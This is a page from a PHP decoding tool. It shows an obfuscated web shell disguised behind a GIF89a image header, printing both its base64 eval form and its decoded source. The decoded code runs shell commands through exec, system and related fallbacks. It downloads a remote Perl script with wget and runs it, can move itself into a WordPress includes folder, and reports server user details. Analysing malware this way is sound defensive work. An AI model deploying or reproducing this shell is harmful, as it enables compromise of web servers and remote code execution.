Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89aGlobex <?php eval('?>'.base64_decode('DQo8P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7DQpmdW5jdG..

Decoded Output download

?>b'
<?php error_reporting(0);
function ex($in)
{
$out = \'\';


if(function_exists(\'exec\'))
	{
		exec($in,$out);
		$out = join("
",$out);
	}
elseif(function_exists(\'passthru\'))
	{
		ob_start();
		passthru($in);
		$out = ob_get_contents();
		ob_end_clean();
	}
elseif(function_exists(\'system\'))
	{
		ob_start();
		system($in);
		$out = ob_get_contents();
		ob_end_clean();
	}
elseif(function_exists(\'shell_exec\'))
	{
		$out = shell_exec($in);
	}
elseif(is_resource($f = popen($in,"r")))
  {
   $out = "";
   while(!@feof($f)) { $out .= fread($f,1024); }
   pclose($f);
  }
return $out;
}
ex("wget http://bristolinventoryservice.co.uk/includes/z1.txt -O /tmp/sess_38175868ba64c2df2acedee76d854153 && perl /tmp/sess_38175868ba64c2df2acedee76d854153");
if (!isset($_SESSION[\'bajak\'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "ada yang inject 
$web$inj";
    $safem0de = @ini_get(\'safe_mode\');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $serper = gethostbyname($_SERVER[\'SERVER_ADDR\']);
    $injektor = gethostbyname($_SERVER[\'REMOTE_ADDR\']);
    $_SESSION[\'bajak\'] = 0;
} else {
    $_SESSION[\'bajak\']++;
};
if (isset($_GET[\'clone\'])) {
    $source = $_SERVER[\'SCRIPT_FILENAME\'];
    $desti = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/wp-simple.php";
    rename($source, $desti);
}
$safem0de = @ini_get(\'safe_mode\');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";

?>'

Did this file decode correctly?

Original Code

GIF89aGlobex
<?php eval('?>'.base64_decode('DQo8P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7DQpmdW5jdGlvbiBleCgkaW4pDQp7DQokb3V0ID0gJyc7DQoNCg0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpDQoJew0KCQlleGVjKCRpbiwkb3V0KTsNCgkJJG91dCA9IGpvaW4oIlxuIiwkb3V0KTsNCgl9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKQ0KCXsNCgkJb2Jfc3RhcnQoKTsNCgkJcGFzc3RocnUoJGluKTsNCgkJJG91dCA9IG9iX2dldF9jb250ZW50cygpOw0KCQlvYl9lbmRfY2xlYW4oKTsNCgl9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSkNCgl7DQoJCW9iX3N0YXJ0KCk7DQoJCXN5c3RlbSgkaW4pOw0KCQkkb3V0ID0gb2JfZ2V0X2NvbnRlbnRzKCk7DQoJCW9iX2VuZF9jbGVhbigpOw0KCX0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSkNCgl7DQoJCSRvdXQgPSBzaGVsbF9leGVjKCRpbik7DQoJfQ0KZWxzZWlmKGlzX3Jlc291cmNlKCRmID0gcG9wZW4oJGluLCJyIikpKQ0KICB7DQogICAkb3V0ID0gIiI7DQogICB3aGlsZSghQGZlb2YoJGYpKSB7ICRvdXQgLj0gZnJlYWQoJGYsMTAyNCk7IH0NCiAgIHBjbG9zZSgkZik7DQogIH0NCnJldHVybiAkb3V0Ow0KfQ0KZXgoIndnZXQgaHR0cDovL2JyaXN0b2xpbnZlbnRvcnlzZXJ2aWNlLmNvLnVrL2luY2x1ZGVzL3oxLnR4dCAtTyAvdG1wL3Nlc3NfMzgxNzU4NjhiYTY0YzJkZjJhY2VkZWU3NmQ4NTQxNTMgJiYgcGVybCAvdG1wL3Nlc3NfMzgxNzU4NjhiYTY0YzJkZjJhY2VkZWU3NmQ4NTQxNTMiKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWydiYWphayddKSkgew0KICAgICR2aXNpdGNvdW50ID0gMDsNCiAgICAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KICAgICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiAgICAkYm9keSA9ICJhZGEgeWFuZyBpbmplY3QgDQokd2ViJGluaiI7DQogICAgJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KICAgIGlmICghJHNhZmVtMGRlKSB7DQogICAgICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgPSBPRkYiOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgPSBPTiI7DQogICAgfTsNCiAgICAkc2VycGVyID0gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnU0VSVkVSX0FERFInXSk7DQogICAgJGluamVrdG9yID0gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSk7DQogICAgJF9TRVNTSU9OWydiYWphayddID0gMDsNCn0gZWxzZSB7DQogICAgJF9TRVNTSU9OWydiYWphayddKys7DQp9Ow0KaWYgKGlzc2V0KCRfR0VUWydjbG9uZSddKSkgew0KICAgICRzb3VyY2UgPSAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107DQogICAgJGRlc3RpID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtaW5jbHVkZXMvd3Atc2ltcGxlLnBocCI7DQogICAgcmVuYW1lKCRzb3VyY2UsICRkZXN0aSk7DQp9DQokc2FmZW0wZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7DQppZiAoISRzYWZlbTBkZSkgew0KICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgOiBPRkYiOw0KfSBlbHNlIHsNCiAgICAkc2VjdXJpdHkgPSAiU0FGRV9NT0RFIDogT04iOw0KfQ0KZWNobyAiPHRpdGxlPlVuS25vd24gLSBTaW1wbGUgU2hlbGw8L3RpdGxlPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+IiAuICRzZWN1cml0eSAuICI8L2I+PGJyPiI7DQokY3VyX3VzZXIgPSAiKCIgLiBnZXRfY3VycmVudF91c2VyKCkgLiAiKSI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5Vc2VyIDogdWlkPSIgLiBnZXRteXVpZCgpIC4gJGN1cl91c2VyIC4gIiBnaWQ9IiAuIGdldG15Z2lkKCkgLiAkY3VyX3VzZXIgLiAiPC9iPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+VW5hbWUgOiAiIC4gcGhwX3VuYW1lKCkgLiAiPC9iPjxicj4iOw0KDQo/Pg==')); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 ce6e007304a1fe4039850ddbe3314581
Eval Count 1
Decode Time 77 ms